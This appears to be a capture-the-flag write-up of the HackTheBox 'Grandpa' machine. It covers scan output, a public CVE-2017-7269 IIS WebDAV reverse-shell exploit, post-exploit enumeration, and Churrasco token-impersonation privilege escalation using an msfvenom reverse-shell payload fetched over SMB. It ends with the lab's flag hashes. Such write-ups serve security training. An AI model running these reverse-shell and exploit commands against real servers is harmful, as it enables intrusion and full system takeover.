HackTheBox | Grandpa

HackTheBox | Grandpa

a month ago   •   8 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Sat Aug 20 22:37:39 2022 as: nmap -T5 -p80 -A -oA scan-all -Pn 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 21 Aug 2022 02:37:51 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   15.02 ms 10.10.14.1
2   15.05 ms 10.10.10.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 20 22:37:52 2022 -- 1 IP address (1 host up) scanned in 13.64 seconds





Service Enumeration

TCP/80

Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r

/Images               (Status: 403) [Size: 218]
/_private             (Status: 403) [Size: 1529]
/_vti_cnf             (Status: 403) [Size: 1529]
/_vti_log             (Status: 403) [Size: 1529]
/_vti_pvt             (Status: 403) [Size: 1529]
/_vti_txt             (Status: 403) [Size: 1529]
/_vti_inf.html        (Status: 200) [Size: 1754]
/_vti_bin             (Status: 403) [Size: 218] 
/aspnet_client        (Status: 403) [Size: 218] 
/images               (Status: 403) [Size: 218] 



WebDAV

Unlike the IIS server on Granny, we aren't allowed to use the PUT method on this server. I tried multiple bypass exploits to upload a file to the root of the WebDAV directory, but nothing was sticking.

Then, I decided to give this exploit a try:

CVE-2017-7269/ii6_reverse_shell.py at main · k4u5h41/CVE-2017-7269
Contribute to k4u5h41/CVE-2017-7269 development by creating an account on GitHub.





Exploit

Review the Exploit

CVE -CVE-2017-7269
The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.

In order to run this exploit, we need to pass the following arguments in order:

  1. Target IP
  2. Target Port
  3. Listener IP
  4. Listener Port



Start a Listener and Catch a Shell

sudo rlwrap nc -lnvp <listener-tcp-port>
python2 iis_reverse_shell.py <target-ip> <target-port> <listener-ip> <listener-port>





Post-Exploit Enumeration

Current User

Click to expand
User Name                    SID     
============================ ========
nt authority\network service S-1-5-20


GROUP INFORMATION
-----------------

Group Name                       Type             SID                                            Attributes                                        
================================ ================ ============================================== ==================================================
NT AUTHORITY\NETWORK SERVICE     User             S-1-5-20                                       Mandatory group, Enabled by default, Enabled group
Everyone                         Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
GRANPA\IIS_WPG                   Alias            S-1-5-21-1709780765-3897210020-3926566182-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users    Alias            S-1-5-32-559                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE             Well-known group S-1-5-6                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization   Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
LOCAL                            Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                    Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled



OS & Kernel

Click to expand
Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 2 Hours, 0 Minutes, 7 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 713 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,256 MB
Page File: In Use:         214 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A



Users

Click to expand
User accounts for \\GRANPA

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
Harry                    IUSR_GRANPA              IWAM_GRANPA              
SUPPORT_388945a0         



Groups

Click to expand
Aliases for \\GRANPA

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users



Network

Interfaces
Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.10.10.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING       404
  TCP    0.0.0.0:5859           0.0.0.0:0              LISTENING       4
  TCP    10.10.10.14:139        0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING       1936


Ping Sweep
N/A



Processes

Click to expand
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
smss.exe                       272 Console                    0        460 K
csrss.exe                      320 Console                    0      3,344 K
winlogon.exe                   344 Console                    0      9,736 K
services.exe                   392 Console                    0      5,180 K
lsass.exe                      404 Console                    0      7,492 K
svchost.exe                    580 Console                    0      3,052 K
svchost.exe                    668 Console                    0      3,708 K
svchost.exe                    732 Console                    0      4,008 K
svchost.exe                    752 Console                    0      3,448 K
svchost.exe                    788 Console                    0     17,784 K
spoolsv.exe                    924 Console                    0      4,136 K
msdtc.exe                      952 Console                    0      4,424 K
cisvc.exe                     1064 Console                    0      2,504 K
svchost.exe                   1112 Console                    0      2,052 K
inetinfo.exe                  1168 Console                    0      8,688 K
svchost.exe                   1204 Console                    0      1,320 K
VGAuthService.exe             1312 Console                    0      9,068 K
vmtoolsd.exe                  1380 Console                    0     14,416 K
svchost.exe                   1480 Console                    0      5,560 K
svchost.exe                   1588 Console                    0      3,772 K
dllhost.exe                   1764 Console                    0      7,084 K
alg.exe                       1936 Console                    0      2,804 K
wmiprvse.exe                  1964 Console                    0      9,172 K
wmiprvse.exe                  2292 Console                    0      5,076 K
w3wp.exe                      2420 Console                    0     58,752 K
davcdata.exe                  2492 Console                    0      2,688 K
cidaemon.exe                  1100 Console                    0      1,232 K
cidaemon.exe                  1372 Console                    0      1,920 K
cidaemon.exe                  1604 Console                    0      1,340 K
logon.scr                     2964 Console                    0      1,504 K
c.exe                         3308 Console                    0      1,544 K
wmiprvse.exe                  3780 Console                    0      4,212 K
tasklist.exe                  3636 Console                    0      3,668 K



Services

Click to expand
These Windows services are started:

   Application Experience Lookup Service
   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Error Reporting Service
   Event Log
   Help and Support
   HTTP SSL
   IIS Admin Service
   Indexing Service
   IPSEC Services
   Logical Disk Manager
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Print Spooler
   Protected Storage
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Terminal Services
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Wireless Configuration
   Workstation
   World Wide Web Publishing Service



Scheduled Tasks

Click to expand
Unable to enumnerate, access denied.





Privilege Escalation

Windows-Exploit-Suggester

On the target, run the command systeminfo and copy the output into a file on Kali. Then, check the target's patch level against a list downloaded from Microsoft.

windows-exploit-suggester.py -u
windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo.txt -l



The Grandparents

Since Grandpa is the same operating system as the Granny host, I decided to give the Churrasco exploit another go here. Because the IIS service is being run with a service account, the service account gets SeImpersonate privileges. Therefore, it is quite easy to steal the SYSTEM token.

The churrasco.exe payload makes this easy for us by impersonating SYSTEM and executing a payload of our choosing.



Running the Exploit

Download the Exploit

wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe



Generate a Msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -f exe -a x86 --platform windows -o privesc.exe



Transfer the Files

Start a SMB Server on Kali

smbserver.py -smb2support evil $PWD



Copy the Files to the Target

Run these commands on the target. This will make a SMB client connection to Kali and copy the files locally to the target.

copy \\kali-vpn-ip\evil\churrasco.exe .
copy \\kali-vpn-ip\evil\privesc.exe .



Start a Listener on Kali and Run the Exploit

sudo rlwrap nc -lnvp <msfvenom-tcp-port>
Start the listener on Kali

.\churrasco.exe -d .\privesc.exe
Run the exploit on the target





Flags

C:\Documents and Settings\Harry\Desktop\user.txt
bdff5ec67c3cff017f2bedc146a5d869


C:\Documents and Settings\Administrator\Desktop\root.txt
9359e905a2c35f861f6a57cecf28bb7b

Spread the word

Keep reading